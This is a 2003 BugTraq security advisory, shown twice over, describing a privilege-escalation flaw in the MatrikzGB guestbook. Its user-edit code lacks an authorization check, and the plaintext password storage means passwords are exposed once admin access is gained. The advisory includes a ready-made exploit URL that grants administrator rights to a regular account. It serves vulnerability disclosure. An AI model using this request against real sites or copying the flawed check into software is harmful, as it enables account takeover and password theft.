BugTraq
Back to list
|
Post reply
Security hole in MatrikzGB
Aug 16 2003 01:51AM
Stephan S. (mastamorphixx web de)
Security hole in MatrikzGB Guestbook
15/8/2003
Vulnerable Versions:
Version 2.0 and prior
Version 3 (not tested)
Summary:
MatrikzGB was written by Thomas Hempel for
www.onsite.org.
A bug in index.php allows a user with a regular user
account to give administrator rights to himself.
Details:
The bug is in the user edit function:
Every regular user is allowed to chanche rights or do any
modifications on existing users.
if ($new_username != "" && $new_password != "") {
create_user($new_username,$new_password,$new_rights,$entry_index);
echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!";
Example:
This is a example how to give administrator rights to
yourself.
http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=o
ptionsok&new_username=regularuser&new_password=regularpass&new_rights=ad
min&user=regularuser&pass=regularpass
Comment:
When you got administrator rights,you can look up the
passwords of all other users,they are in plaintext.
Vendor status:
Vendor has been contacted.
by Stephan "mastamorphixx" S. ,member of
www.lostkey.org
contact:mastamorphixx (at) web (dot) de [email concealed]
irc.euirc.de #lostkey
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Security hole in MatrikzGB Guestbook
15/8/2003
Vulnerable Versions:
Version 2.0 and prior
Version 3 (not tested)
Summary:
MatrikzGB was written by Thomas Hempel for
www.onsite.org.
A bug in index.php allows a user with a regular user
account to give administrator rights to himself.
Details:
The bug is in the user edit function:
Every regular user is allowed to chanche rights or do any
modifications on existing users.
if ($new_username != "" && $new_password != "") {
create_user($new_username,$new_password,$new_rights,$entry_index);
echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!";
Example:
This is a example how to give administrator rights to
yourself.
http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=o
ptionsok&new_username=regularuser&new_password=regularpass&new_rights=ad
min&user=regularuser&pass=regularpass
Comment:
When you got administrator rights,you can look up the
passwords of all other users,they are in plaintext.
Vendor status:
Vendor has been contacted.
by Stephan "mastamorphixx" S. ,member of
www.lostkey.org
contact:mastamorphixx (at) web (dot) de [email concealed]
irc.euirc.de #lostkey
[ reply ]